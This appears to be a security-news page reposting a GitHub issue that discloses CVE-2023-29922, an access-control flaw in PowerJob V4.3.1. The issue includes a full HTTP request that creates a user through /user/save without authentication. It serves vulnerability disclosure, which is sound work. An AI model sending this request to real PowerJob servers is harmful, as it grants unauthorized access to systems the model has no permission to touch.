Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-29922: I want to report an unauthorized access vulnerability · Issue #585 · PowerJob/PowerJob

PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.

CVE
#vulnerability#web#mac#apple#js#java#intel#auth#chrome#webkit

Describe the bug
A clear and concise description of what the bug is.
Hello teams,I want to report an unauthorized access vulnerability
There is an unauthorized access on the /user/save interface.
Just send this data packet:

`POST /user/save HTTP/1.1
Host: test.cn:7700
Content-Length: 111
Accept: application/json, text/plain, /
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69
Content-Type: application/json;charset=UTF-8
Origin: http://test.cn:7700
Referer: http://test.cn:7700/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

{"username":"test","phone":"test","email":"test","webHook":"test"}`

It creates a user without requiring any permissions.

To Reproduce
Steps to reproduce the behavior.

Expected behavior
A clear and concise description of what you expected to happen.

Environment

  • PowerJob Version:
  • Java Version: jdk 8
  • OS: Mac OS

Screenshots
If applicable, add screenshots to help explain your problem.

Additional context
Add any other context about the problem here.

Related news

GHSA-c23v-vqw5-52c5: PowerJob vulnerable to Incorrect Access Control via the create user/save interface.

PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907